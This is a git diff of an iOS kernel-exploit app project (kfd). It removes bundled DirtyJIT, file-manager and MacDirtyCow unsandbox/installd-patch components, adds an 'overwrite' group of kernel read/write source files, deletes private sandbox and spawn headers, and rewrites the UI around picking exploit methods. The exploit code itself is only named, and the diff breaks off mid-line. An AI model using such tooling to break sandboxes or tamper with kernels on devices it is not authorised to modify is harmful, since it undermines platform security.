@@ -263,105 +182,41 @@ path = "Preview Content"; sourceTree = ""; }; - 6E75BFA62A8475790056ABDA /* fun */ = { - isa = PBXGroup; - children = ( - D58653602ABBB28D005A2379 /* grant_full_disk_access.m */, - D58653632ABBB28D005A2379 /* grant_full_disk_access.h */, - D58653622ABBB28D005A2379 /* vm_unaligned_copy_switch_race.c */, - D58653612ABBB28D005A2379 /* vm_unaligned_copy_switch_race.h */, - D51A38012AB56F8400C147E2 /* cs_blobs.h */, - D51A38072AB56F8400C147E2 /* cs_blobs.m */, - 6E75BFAC2A8476400056ABDA /* krw.h */, - D51A38032AB56F8400C147E2 /* krw.c */, - D51A38042AB56F8400C147E2 /* thanks_opa334dev_htrowii.h */, - D51A38062AB56F8400C147E2 /* thanks_opa334dev_htrowii.m */, - 6ECE5B532A90609100792D41 /* utils.h */, - D51A38022AB56F8400C147E2 /* utils.m */, - 6ECE5B562A9065B300792D41 /* vnode.h */, - D51A38052AB56F8400C147E2 /* vnode.m */, - 6E08ABFF2A9A3BA600BF5B0D /* helpers.h */, - 6E08ABFD2A9A3B9800BF5B0D /* helpers.m */, - 6ECE5B502A905FDE00792D41 /* proc.h */, - 6ECE5B512A905FDE00792D41 /* proc.c */, - 6E75BFA92A8475D30056ABDA /* fun.h */, - 6E75BFA72A8475C70056ABDA /* fun.m */, - 6E75BFAF2A847AC50056ABDA /* offsets.h */, - 6E75BFAD2A847A980056ABDA /* offsets.m */, - ); - path = fun; - sourceTree = ""; - }; 8C0AF3562A75B6BE0065C9DD /* Frameworks */ = { isa = PBXGroup; children = ( - D58309A92A9BC38800828844 /* IOKit.framework */, - D5AFB5C02ABE167C006266EA /* ProcessCommunication */, - D52BA4352AB57EC9002E9836 /* DirtyCowKit */, + D5D2DD9C2B46AC3C00B62BED /* IOKit.framework */, ); name = Frameworks; sourceTree = ""; }; - D52BA44F2AB5812A002E9836 /* JIT */ = { + D57B52072B46995700374989 /* overwrite */ = { isa = PBXGroup; children = ( - D52BA4532AB5812A002E9836 /* DirtyJIT */, - D52BA4512AB5812A002E9836 /* ApplicationManager.swift */, + D57B521A2B46995700374989 /* fun.h */, + D57B520F2B46995700374989 /* fun.m */, + D57B520E2B46995700374989 /* krw.h */, + D57B52162B46995700374989 /* krw.c */, + D57B520B2B46995700374989 /* vnode.h */, + D57B52182B46995700374989 
/* vnode.m */, + D57B52092B46995700374989 /* thanks_opa334dev_htrowii.h */, + D57B52142B46995700374989 /* thanks_opa334dev_htrowii.m */, + D57B520D2B46995700374989 /* offsets.h */, + D57B52172B46995700374989 /* offsets.m */, + D57B520C2B46995700374989 /* proc.h */, + D57B52192B46995700374989 /* proc.c */, + D57B520A2B46995700374989 /* utils.h */, + D57B52132B46995700374989 /* utils.m */, + D57B521C2B46995700374989 /* helpers.h */, + D57B52122B46995700374989 /* helpers.m */, + D5D2DD972B46A90A00B62BED /* vm_unaligned_copy_switch_race.h */, + D5D2DD962B46A90A00B62BED /* vm_unaligned_copy_switch_race.c */, + D5D2DD992B46A91B00B62BED /* grant_full_disk_access.h */, + D5D2DD9A2B46A91B00B62BED /* grant_full_disk_access.m */, ); - path = JIT; + path = overwrite; sourceTree = ""; }; - D52BA4532AB5812A002E9836 /* DirtyJIT */ = { - isa = PBXGroup; - children = ( - D52BA46C2AB586BF002E9836 /* Alert++.swift */, - D52BA46A2AB5866D002E9836 /* TextField++.swift */, - D52BA4562AB5812A002E9836 /* SearchBar.swift */, - D52BA4572AB5812A002E9836 /* DirtyJITView.swift */, - D52BA4582AB5812A002E9836 /* AppsView.swift */, - ); - path = DirtyJIT; - sourceTree = ""; - }; - D58654382ABD508B005A2379 /* filemanager_by_akusio */ = { - isa = PBXGroup; - children = ( - D58654592ABD508B005A2379 /* ViewController.m */, - D58654702ABD508B005A2379 /* ViewController.h */, - D586545A2ABD508B005A2379 /* SceneDelegate.m */, - D58654712ABD508B005A2379 /* SceneDelegate.h */, - D58654672ABD508B005A2379 /* AppDelegate.m */, - D58654512ABD508B005A2379 /* AppDelegate.h */, - D586545F2ABD508B005A2379 /* FileManager.m */, - D586543B2ABD508B005A2379 /* FileManager.h */, - D58654632ABD508B005A2379 /* AXFIle.m */, - D58654542ABD508B005A2379 /* AXFile.h */, - D58654652ABD508B005A2379 /* AXFileViewController.m */, - D58654532ABD508B005A2379 /* AXFileViewController.h */, - D58654622ABD508B005A2379 /* AXNavigationController.m */, - D58654392ABD508B005A2379 /* AXNavigationController.h */, - D58654582ABD508B005A2379 /* 
AXLocationBackgrounder.m */, - D586546F2ABD508B005A2379 /* AXLocationBackgrounder.h */, - D58654692ABD508B005A2379 /* patchfinder64.m */, - D58654552ABD508B005A2379 /* patchfinder64.h */, - D58654602ABD508B005A2379 /* kerneldec.cpp */, - D586546A2ABD508B005A2379 /* kstruct.h */, - D58654642ABD508B005A2379 /* kerneldec.h */, - D58654682ABD508B005A2379 /* lzssdec.cpp */, - D586546C2ABD508B005A2379 /* lzfse.h */, - D586546D2ABD508B005A2379 /* lzssdec.h */, - D58654562ABD508B005A2379 /* lzfse_fse.h */, - D586546B2ABD508B005A2379 /* lzfse_internal.h */, - D586543A2ABD508B005A2379 /* lzfse_tunables.h */, - D58654522ABD508B005A2379 /* lzfse_encode_tables.h */, - D586545B2ABD508B005A2379 /* LaunchScreen.storyboard */, - D586545D2ABD508B005A2379 /* Main.storyboard */, - D58654662ABD508B005A2379 /* liblzfse.a */, - ); - name = filemanager_by_akusio; - path = MiniRootFileManager15/filemanager_by_akusio; - sourceTree = SOURCE_ROOT; - }; D5CB286D2AB5D02F009DF689 /* info */ = { isa = PBXGroup; children = ( @@ -388,8 +243,6 @@ ); name = kfd; packageProductDependencies = ( - D52BA4612AB58212002E9836 /* DirtyCowKit */, - D5AFB5C22ABE1691006266EA /* SwiftfulLoadingIndicators */, ); productName = kfd; productReference = 297BA1052A310AE100D1E51A /* kfd.app */; @@ -421,7 +274,6 @@ ); mainGroup = 297BA0FC2A310AE100D1E51A; packageReferences = ( - D5AFB5C12ABE1691006266EA /* XCRemoteSwiftPackageReference "SwiftfulLoadingIndicators" */, ); productRefGroup = 297BA1062A310AE100D1E51A /* Products */; projectDirPath = ""; @@ -437,9 +289,7 @@ isa = PBXResourcesBuildPhase; buildActionMask = 2147483647; files = ( - D586547F2ABD508B005A2379 /* LaunchScreen.storyboard in Resources */, D51A38112AB5717500C147E2 /* files in Resources */, - D58654802ABD508B005A2379 /* Main.storyboard in Resources */, ); runOnlyForDeploymentPostprocessing = 0; }; 
@@ -450,64 +300,23 @@ isa = PBXSourcesBuildPhase; buildActionMask = 2147483647; files = ( - D5B87E8F2B00CC2E0024E70C /* FileManager.swift in Sources */, - D5AFB71B2AC0252D006266EA /* grant_full_disk_access.m in Sources */, - D58653662ABBB60E005A2379 /* vm_unaligned_copy_switch_race.c in Sources */, - D52BA4652AB582C9002E9836 /* SearchBar.swift in Sources */, - D52BA4662AB582C9002E9836 /* DirtyJITView.swift in Sources */, - D52BA4672AB582C9002E9836 /* AppsView.swift in Sources */, - D58654892ABD508B005A2379 /* lzssdec.cpp in Sources */, - D5AFB5B72ABE074C006266EA /* KFD-manager.m in Sources */, - D52BA4692AB582C9002E9836 /* ApplicationManager.swift in Sources */, - D5AFB5C52ABE1781006266EA /* Logger.swift in Sources */, - D51A380A2AB56F8400C147E2 /* vnode.m in Sources */, - D51A380C2AB56F8400C147E2 /* cs_blobs.m in Sources */, - D58654842ABD508B005A2379 /* AXNavigationController.m in Sources */, - D58654822ABD508B005A2379 /* kerneldec.cpp in Sources */, - 6E75BFAE2A847A980056ABDA /* offsets.m in Sources */, + D57B52282B46995800374989 /* proc.c in Sources */, + D57B521E2B46995800374989 /* fun.m in Sources */, + D5D2DD982B46A90A00B62BED /* vm_unaligned_copy_switch_race.c in Sources */, + D57B52212B46995800374989 /* helpers.m in Sources */, 297BA10B2A310AE100D1E51A /* ContentView.swift in Sources */, - D52BA46D2AB586BF002E9836 /* Alert++.swift in Sources */, - D51A38092AB56F8400C147E2 /* krw.c in Sources */, - 6E75BFA82A8475C70056ABDA /* fun.m in Sources */, - D51A38082AB56F8400C147E2 /* utils.m in Sources */, - D586547C2ABD508B005A2379 /* AXLocationBackgrounder.m in Sources */, - D58654882ABD508B005A2379 /* AppDelegate.m in Sources */, - D58654812ABD508B005A2379 /* FileManager.m in Sources */, - D52BA46B2AB5866D002E9836 /* TextField++.swift in Sources */, - D586547E2ABD508B005A2379 /* SceneDelegate.m in Sources */, - 6ECE5B522A905FDE00792D41 /* proc.c in Sources */, - D586548A2ABD508B005A2379 /* patchfinder64.m in Sources */, - D58654862ABD508B005A2379 /* 
AXFileViewController.m in Sources */, - 6E08ABFE2A9A3B9800BF5B0D /* helpers.m in Sources */, - D586547D2ABD508B005A2379 /* ViewController.m in Sources */, + D57B52262B46995800374989 /* offsets.m in Sources */, + D57B52232B46995800374989 /* thanks_opa334dev_htrowii.m in Sources */, + D57B52272B46995800374989 /* vnode.m in Sources */, + D5D2DD9B2B46A91B00B62BED /* grant_full_disk_access.m in Sources */, + D57B52222B46995800374989 /* utils.m in Sources */, + D57B52252B46995800374989 /* krw.c in Sources */, 297BA1092A310AE100D1E51A /* kfdApp.swift in Sources */, - D5AFB5BF2ABE1671006266EA /* LogView.swift in Sources */, - D51A380B2AB56F8400C147E2 /* thanks_opa334dev_htrowii.m in Sources */, - D58654852ABD508B005A2379 /* AXFIle.m in Sources */, ); runOnlyForDeploymentPostprocessing = 0; }; /* End PBXSourcesBuildPhase section */ -/* Begin PBXVariantGroup section */ - D586545B2ABD508B005A2379 /* LaunchScreen.storyboard */ = { - isa = PBXVariantGroup; - children = ( - D586545C2ABD508B005A2379 /* Base */, - ); - name = LaunchScreen.storyboard; - sourceTree = ""; - }; - D586545D2ABD508B005A2379 /* Main.storyboard */ = { - isa = PBXVariantGroup; - children = ( - D586545E2ABD508B005A2379 /* Base */, - ); - name = Main.storyboard; - sourceTree = ""; - }; -/* End PBXVariantGroup section */ - /* Begin XCBuildConfiguration section */ 297BA1122A310AE200D1E51A /* Debug */ = { isa = XCBuildConfiguration; @@ -664,10 +473,7 @@ "$(inherited)", "@executable_path/Frameworks", ); - LIBRARY_SEARCH_PATHS = ( - "$(inherited)", - "$(PROJECT_DIR)/MiniRootFileManager15/filemanager_by_akusio", - ); + LIBRARY_SEARCH_PATHS = "$(inherited)"; MARKETING_VERSION = 1.0; OTHER_CFLAGS = "-Os"; OTHER_LDFLAGS = ( @@ -729,10 +535,7 @@ "$(inherited)", "@executable_path/Frameworks", ); - LIBRARY_SEARCH_PATHS = ( - "$(inherited)", - "$(PROJECT_DIR)/MiniRootFileManager15/filemanager_by_akusio", - ); + LIBRARY_SEARCH_PATHS = "$(inherited)"; MARKETING_VERSION = 1.0; OTHER_CFLAGS = "-Os"; OTHER_LDFLAGS = ( 
@@ -776,29 +579,6 @@ defaultConfigurationName = Release; }; /* End XCConfigurationList section */ - -/* Begin XCRemoteSwiftPackageReference section */ - D5AFB5C12ABE1691006266EA /* XCRemoteSwiftPackageReference "SwiftfulLoadingIndicators" */ = { - isa = XCRemoteSwiftPackageReference; - repositoryURL = "https://github.com/ndsarno/SwiftfulLoadingIndicators.git"; - requirement = { - kind = upToNextMajorVersion; - minimumVersion = 0.0.4; - }; - }; -/* End XCRemoteSwiftPackageReference section */ - -/* Begin XCSwiftPackageProductDependency section */ - D52BA4612AB58212002E9836 /* DirtyCowKit */ = { - isa = XCSwiftPackageProductDependency; - productName = DirtyCowKit; - }; - D5AFB5C22ABE1691006266EA /* SwiftfulLoadingIndicators */ = { - isa = XCSwiftPackageProductDependency; - package = D5AFB5C12ABE1691006266EA /* XCRemoteSwiftPackageReference "SwiftfulLoadingIndicators" */; - productName = SwiftfulLoadingIndicators; - }; -/* End XCSwiftPackageProductDependency section */ }; rootObject = 297BA0FD2A310AE100D1E51A /* Project object */; } diff --git a/kfd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved b/kfd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved deleted file mode 100644 index e8f04dd4..00000000 --- a/kfd.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved +++ /dev/null @@ -1,16 +0,0 @@ -{ - "object": { - "pins": [ - { - "package": "SwiftfulLoadingIndicators", - "repositoryURL": "https://github.com/ndsarno/SwiftfulLoadingIndicators.git", - "state": { - "branch": null, - "revision": "85858c0246dcd781228301f9928519f75ce89758", - "version": "0.0.4" - } - } - ] - }, - "version": 1 -} diff --git a/kfd/BottomBar.swift b/kfd/BottomBar.swift deleted file mode 100644 index 8ba0d0a0..00000000 --- a/kfd/BottomBar.swift +++ /dev/null 
@@ -1,83 +0,0 @@
-import SwiftUI
-import BottomBar_SwiftUI
-
-let items: [BottomBarItem] = [
- BottomBarItem(icon: "house.fill", title: "Home", color: .purple),
- BottomBarItem(icon: "heart", title: "Likes", color: .pink),
- BottomBarItem(icon: "person.fill", title: "Profile", color: .blue)
-]
-
-struct BasicView: View {
- let item: BottomBarItem
-
- var detailText: String {
- "\(item.title) Detail"
-}
-
-var followButton: some View {
- Button(action: openTwitter) {
- VStack {
- Text("Developed by Bezhan Odinaev")
- .font(.headline)
- .foregroundColor(item.color)
-
- Text("@smartvipere75")
- .font(.subheadline)
- .foregroundColor(.gray)
- }
- }
-}
-
-var destination: some View {
- Text(detailText)
- .navigationBarTitle(Text(detailText))
-}
-
-var navigateButton: some View {
- NavigationLink(destination: destination) {
- if(item.color == .blue){
- ContentView()
- } else if(item.color == .pink){
- DirtyJITView()
- } else {
- FileManagerUIKitViewControllerWrapper()
- }
- }
-}
-
-func openTwitter() {
- guard let url = URL(string: "https://twitter.com/smartvipere75") else {
- return
- }
- UIApplication.shared.open(url, options: [:], completionHandler: nil)
-}
-
-var body: some View {
- VStack {
- navigateButton
- }
- }
-}
-
-struct BarContentView : View {
- @State private var selectedIndex: Int = 0
-
- var selectedItem: BottomBarItem {
- items[selectedIndex]
- }
-
-var body: some View {
- NavigationView {
- VStack {
- BasicView(item: selectedItem)
- .navigationBarTitle(Text(selectedItem.title))
- .toolbar {
- ToolbarItem(placement: .bottomBar) {
- BottomBar(selectedIndex: $selectedIndex, items: items)
- }
- }
- //BottomBar(selectedIndex: $selectedIndex, items: items)
- }
- }
- }
-}
diff --git a/kfd/CBindings/CBindings.h b/kfd/CBindings/CBindings.h
deleted file mode 100644
index f9b64e82..00000000
--- a/kfd/CBindings/CBindings.h
+++ /dev/null
@@ -1,36 +0,0 @@
-//
-// CBindings.h
-// kexploitd
-//
-// Created by Linus Henze.
-// Copyright © 2022 Pinauten GmbH. All rights reserved.
-//
-
-#ifndef CBindings_h
-#define CBindings_h
-
-#include
-#include
-#import
-#include
-
-#include "posix_spawn.h"
-#include "th_state.h"
-//#include "libjailbreak.h"
-//#include "wifi.h"
-
-extern int decompress_tar_zstd(const char* src_file_path, const char* dst_file_path);
-extern int loadEmbeddedSignature(NSString* filePath);
-uint64_t getPCIMemorySize(void);
-NSString *getBootManifestHash(void);
-
-// Also define some IOKit stuff...
-extern const mach_port_t kIOMainPortDefault;
-
-extern mach_port_t IORegistryEntryFromPath(mach_port_t mainPort, const io_string_t __nonnull path);
-extern CFTypeRef __nonnull IORegistryEntryCreateCFProperty(mach_port_t entry, CFStringRef __nonnull key, CFAllocatorRef __nullable allocator, uint32_t options);
-extern kern_return_t IOObjectRelease(mach_port_t object);
-
-extern uint64_t reboot3(uint64_t how, uint64_t unk);
-
-#endif /* CBindings_h */
diff --git a/kfd/CBindings/posix_spawn.h b/kfd/CBindings/posix_spawn.h
deleted file mode 100644
index 23e36410..00000000
--- a/kfd/CBindings/posix_spawn.h
+++ /dev/null
@@ -1,135 +0,0 @@ -/* - * Copyright (c) 2006, 2008 Apple,Inc. All rights reserved. - * - * @APPLE_LICENSE_HEADER_START@ - * - * This file contains Original Code and/or Modifications of Original Code - * as defined in and that are subject to the Apple Public Source License - * Version 2.0 (the 'License'). You may not use this file except in - * compliance with the License. Please obtain a copy of the License at - * http://www.opensource.apple.com/apsl/ and read it before using this - * file. - * - * The Original Code and all software distributed under the License are - * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER - * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, - * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. - * Please see the License for the specific language governing rights and - * limitations under the License. - * - * @APPLE_LICENSE_HEADER_END@ - */ - -#ifndef _SPAWN_PRIVATE_H_ -#define _SPAWN_PRIVATE_H_ - -#include -#include -#include -#include -#include - -#undef __API_AVAILABLE -#define __API_AVAILABLE(...) 
- -__BEGIN_DECLS - -int posix_spawnattr_getpcontrol_np(const posix_spawnattr_t * __restrict, int * __restrict) __API_AVAILABLE(macos(10.6), ios(3.2)); -int posix_spawnattr_setpcontrol_np(posix_spawnattr_t *, const int) __API_AVAILABLE(macos(10.6), ios(3.2)); - -int posix_spawnattr_getprocesstype_np(const posix_spawnattr_t * __restrict, int * __restrict) __API_AVAILABLE(macos(10.8), ios(6.0)); -int posix_spawnattr_setprocesstype_np(posix_spawnattr_t *, const int) __API_AVAILABLE(macos(10.8), ios(6.0)); - -int posix_spawnattr_setcpumonitor(posix_spawnattr_t * __restrict, uint64_t, uint64_t) __API_AVAILABLE(macos(10.8), ios(6.0)); -int posix_spawnattr_getcpumonitor(posix_spawnattr_t * __restrict, uint64_t *, uint64_t *) __API_AVAILABLE(macos(10.8), ios(6.0)); -int posix_spawnattr_setcpumonitor_default(posix_spawnattr_t * __restrict) __API_AVAILABLE(macos(10.9), ios(6.0)); - -#if (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) -int posix_spawnattr_setjetsam(posix_spawnattr_t * __restrict attr, - short flags, int priority, int memlimit) __API_UNAVAILABLE(macos) __API_AVAILABLE(ios(5.0)); -#endif /* (TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ - -int posix_spawnattr_setjetsam_ext(posix_spawnattr_t * __restrict attr, - short flags, int priority, int memlimit_active, int memlimit_inactive) __API_AVAILABLE(macos(10.11), ios(9.0)); - -// time-to-relaunch after jetsam, set by launchd -int posix_spawnattr_set_jetsam_ttr_np(const posix_spawnattr_t * __restrict attr, uint32_t count, uint32_t *ttrs_millis) __OSX_AVAILABLE_STARTING(__MAC_10_15, __IPHONE_13_0); - -int posix_spawnattr_set_threadlimit_ext(posix_spawnattr_t * __restrict attr, - int thread_limit) __API_AVAILABLE(macos(10.14), ios(12.0), tvos(12.0), watchos(5.0)); - -#define POSIX_SPAWN_IMPORTANCE_PORT_COUNT 32 -int posix_spawnattr_set_importancewatch_port_np(posix_spawnattr_t * __restrict attr, - int count, mach_port_t portarray[]) __API_AVAILABLE(macos(10.9), ios(6.0)); - -int 
posix_spawnattr_set_registered_ports_np(posix_spawnattr_t * __restrict attr, mach_port_t portarray[], uint32_t count) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); - -int -posix_spawnattr_set_ptrauth_task_port_np(posix_spawnattr_t * __restrict attr, - mach_port_t port) __API_AVAILABLE(macos(10.16), ios(14.0), tvos(14.0), watchos(7.0)); - -#define POSIX_SPAWN_MACPOLICYINFO_WITHSIZE 1 -int posix_spawnattr_getmacpolicyinfo_np(const posix_spawnattr_t * __restrict, const char *, void **, size_t *) __API_AVAILABLE(macos(10.9), ios(7.0)); -int posix_spawnattr_setmacpolicyinfo_np(posix_spawnattr_t * __restrict, const char *, void *, size_t) __API_AVAILABLE(macos(10.9), ios(7.0)); - -int posix_spawnattr_setcoalition_np(const posix_spawnattr_t * __restrict, uint64_t, int, int) __API_AVAILABLE(macos(10.10), ios(8.0)); - -int posix_spawnattr_set_qos_clamp_np(const posix_spawnattr_t * __restrict, uint64_t) __API_AVAILABLE(macos(10.10), ios(8.0)); -int posix_spawnattr_get_qos_clamp_np(const posix_spawnattr_t * __restrict, uint64_t * __restrict) __API_AVAILABLE(macos(10.10), ios(8.0)); - -int posix_spawnattr_set_darwin_role_np(const posix_spawnattr_t * __restrict, uint64_t) __API_AVAILABLE(macos(10.11), ios(9.0)); -int posix_spawnattr_get_darwin_role_np(const posix_spawnattr_t * __restrict, uint64_t * __restrict) __API_AVAILABLE(macos(10.11), ios(9.0)); - -int posix_spawnattr_set_persona_np(const posix_spawnattr_t * __restrict, uid_t, uint32_t) __API_AVAILABLE(macos(10.11), ios(9.0)); -int posix_spawnattr_set_persona_uid_np(const posix_spawnattr_t * __restrict, uid_t) __API_AVAILABLE(macos(10.11), ios(9.0)); -int posix_spawnattr_set_persona_gid_np(const posix_spawnattr_t * __restrict, gid_t) __API_AVAILABLE(macos(10.11), ios(9.0)); -int posix_spawnattr_set_persona_groups_np(const posix_spawnattr_t * __restrict, int, gid_t * __restrict, uid_t) __API_AVAILABLE(macos(10.11), ios(9.0)); - -int posix_spawnattr_set_max_addr_np(const posix_spawnattr_t * __restrict 
attr, uint64_t max_addr) __API_AVAILABLE(macos(10.14), ios(12.0), tvos(12.0), watchos(5.0)); - -int posix_spawnattr_set_uid_np(const posix_spawnattr_t * __restrict, uid_t) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); -int posix_spawnattr_set_gid_np(const posix_spawnattr_t * __restrict, gid_t) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); -int posix_spawnattr_set_groups_np(const posix_spawnattr_t * __restrict, int, gid_t * __restrict, uid_t) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); -int posix_spawnattr_set_login_np(const posix_spawnattr_t * __restrict, const char * __restrict) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); - -int posix_spawnattr_set_subsystem_root_path_np(posix_spawnattr_t *attr, char *path); __API_AVAILABLE(macos(11.0), ios(14.0), tvos(14.0), watchos(7.0)); - -int posix_spawnattr_set_platform_np(posix_spawnattr_t *attr, int platform, uint32_t flags); __API_AVAILABLE(macos(11.0), ios(14.0), tvos(14.0), watchos(7.0)); - -int posix_spawnattr_disable_ptr_auth_a_keys_np(posix_spawnattr_t *attr, uint32_t flags); __API_AVAILABLE(macos(11.0), ios(14.0), tvos(14.0), watchos(7.0)); - -int posix_spawn_file_actions_add_fileportdup2_np(posix_spawn_file_actions_t * __restrict, mach_port_t, int) __API_AVAILABLE(macos(10.15), ios(13.0), tvos(13.0), watchos(6.0)); - -struct sandbox_spawnattrs { - uint8_t unk[8192]; -}; - -void sandbox_spawnattrs_init(struct sandbox_spawnattrs *attrs); -int sandbox_spawnattrs_setprofilename(struct sandbox_spawnattrs *attrs, const char *); -int sandbox_spawnattrs_setcontainer(struct sandbox_spawnattrs *attrs, const char *); -int sandbox_init(const char *profile, uint64_t flags, char **errorbuf); - -void* sandbox_create_params(); -int sandbox_set_param(void* params, const char* key, const char* value); -void* sandbox_compile_string(const char* profile_str, - void* params, - char** error); -int sandbox_apply(void* profile); -void 
sandbox_free_params(void* params); -void sandbox_free_profile(void* profile); - -struct sandbox_policy_layout { - void *profile; - uint64_t len; - void *container; - uint64_t containerLen; - uint64_t pad1; - uint64_t pad2; -}; - -int __sandbox_ms(const char* policy, int call, struct sandbox_policy_layout* arg); - -__END_DECLS - -#endif /* !defined _SPAWN_PRIVATE_H_*/ diff --git a/kfd/CBindings/th_state.h b/kfd/CBindings/th_state.h deleted file mode 100644 index c38712b5..00000000 --- a/kfd/CBindings/th_state.h +++ /dev/null 
@@ -1,46 +0,0 @@
-
-/*
- * Copyright (c) 2006, 2008 Apple,Inc. All rights reserved.
- *
- * @APPLE_LICENSE_HEADER_START@
- *
- * This file contains Original Code and/or Modifications of Original Code
- * as defined in and that are subject to the Apple Public Source License
- * Version 2.0 (the 'License'). You may not use this file except in
- * compliance with the License. Please obtain a copy of the License at
- * http://www.opensource.apple.com/apsl/ and read it before using this
- * file.
- *
- * The Original Code and all software distributed under the License are
- * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
- * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
- * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
- * Please see the License for the specific language governing rights and
- * limitations under the License.
- *
- * @APPLE_LICENSE_HEADER_END@
- */
-
-#ifndef TH_STATE_H_
-#define TH_STATE_H_
-
-#include
-#include
-
-#ifdef __arm64__
-
-uint64_t thread_state64_get_pc(const arm_thread_state64_t *ts);
-void thread_state64_set_pc(arm_thread_state64_t *ts, uint64_t pc);
-uint64_t thread_state64_get_lr(const arm_thread_state64_t *ts);
-void thread_state64_set_lr(arm_thread_state64_t *ts, uint64_t lr);
-
-#endif /* defined __arm64__ */
-
-struct exception_message_reply {
- mach_msg_header_t hdr;
- NDR_record_t NDR;
- kern_return_t result;
-};
-
-#endif /* !defined TH_STATE_H_ */
diff --git a/kfd/ContentView.swift b/kfd/ContentView.swift
index ad3ba977..10a1f83d 100644
--- a/kfd/ContentView.swift
+++ b/kfd/ContentView.swift
@@ -1,370 +1,80 @@ +/* + * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. + */ + import SwiftUI -import UIKit -import MacDirtyCow struct ContentView: View { - @State private var kfd: UInt64 = 0 - - @State private var puafPages = 2048 - @State private var puafMethod = 1 - @State private var kreadMethod = 1 - @State private var kwriteMethod = 1 - @State private var enableHideHomebar = false - @State private var enableHideDock = false - @State private var enableResSet = false - @State private var enableReplacecert = true - @State private var enableCustomSysColors = false - @State private var changeRegion = false - @State private var whitelist = false - @State private var supervise = false - @State private var enableCustomFont = false - - var puafPagesOptions = [16, 32, 64, 128, 256, 512, 1024, 2048] - var puafMethodOptions = ["physpuppet", "smith"] - var kreadMethodOptions = ["kqueue_workloop_ctl", "sem_open"] - var kwriteMethodOptions = ["dup", "sem_open"] - - @State private var message = "ready!" - - @State private var isSettingsPopoverPresented = false // Track the visibility of the settings popup - @State private var isTweaksPopoverPresented = false - @State private var isFilePopoverPresented = false - @State private var isJITPopoverPresented = false - @State private var isSwiftFilePopoverPresented = false - - @State private var isLogPopoverPresented = false - @State var advancedLogsTemporarilyEnabled: Bool = true - @State var advancedLogsByDefault: Bool = true - @Environment(\.presentationMode) var presentation - - func unsandboxing() { - do { - try MacDirtyCow.unsandbox() - DispatchQueue.main.async { - message = "unsandboxed!" - } - if (MacDirtyCow.patch_installd() == true){ - DispatchQueue.main.async { - message = "patched installd!" - } - } else { - DispatchQueue.main.async { - message = "error occur patching installd!" 
- } - } - } catch { - print(error) - } - } + private var puaf_pages_options = [16, 32, 64, 128, 256, 512, 1024, 2048] + @State private var puaf_pages_index = 7 + @State private var puaf_pages = 0 + + private var puaf_method_options = ["physpuppet", "smith", "landa"] + @State private var puaf_method = 2 + + private var kread_method_options = ["kqueue_workloop_ctl", "sem_open"] + @State private var kread_method = 1 + + private var kwrite_method_options = ["dup", "sem_open"] + @State private var kwrite_method = 1 var body: some View { NavigationView { - List { - Section(header: Text("Status")) { - Text(message) - if kfd != 0 { - VStack(alignment: .leading, spacing: 8) { - Text("Success!") - .font(.headline) - .foregroundColor(.green) - Text("View output in Xcode") - .foregroundColor(.gray) + Form { + Section { + Picker(selection: $puaf_pages_index, label: Text("puaf pages:")) { + ForEach(0 ..< puaf_pages_options.count, id: \.self) { + Text(String(self.puaf_pages_options[$0])) } - } + }.disabled(kfd != 0) } - - Section(header: Text("actions")) { - Text("kopen") - .onTapGesture{ - kfd = do_kopen(UInt64(puafPages), UInt64(puafMethod), UInt64(kreadMethod), UInt64(kwriteMethod)) - DispatchQueue.main.async { - message = "kopened!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).disabled(kfd != 0).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("kclose") - .onTapGesture{ - do_kclose() - puafPages = 0 - kfd = 0 - DispatchQueue.main.async { - message = "kclosed!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).disabled(kfd == 0).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("fun and kclose") - .onTapGesture{ - let tweaks = enabledTweaks() - var cTweaks: [UnsafeMutablePointer?] 
= tweaks.map { strdup($0) } - cTweaks.append(nil) - cTweaks.withUnsafeMutableBufferPointer { buffer in - do_fun(buffer.baseAddress, Int32(buffer.count - 1)) - } - cTweaks.forEach { free($0) } - DispatchQueue.main.async { - message = "done fun!" - } - usleep(1000) - do_kclose() - puafPages = 0 - kfd = 0 - DispatchQueue.main.async { - message = "kclose!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).disabled(kfd == 0).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("do kfd tasks and kclose") - .onTapGesture{ - do_tasks() - DispatchQueue.main.async { - message = "done!" - } - usleep(1000) - do_kclose() - puafPages = 0 - kfd = 0 - DispatchQueue.main.async { - message = "kclose!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).disabled(kfd == 0).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("patch installd w/mdc") - .onTapGesture{ - print("mdc") - unsandboxing() - DispatchQueue.main.async { - message = "sucecss!" - } - }.frame(minWidth: 0, maxWidth: .infinity, alignment: .leading).foregroundColor(Color(red: 0.678, green: 0.847, blue: 0.901, opacity: 1)) - Text("kill backboardd") - .onTapGesture{ - 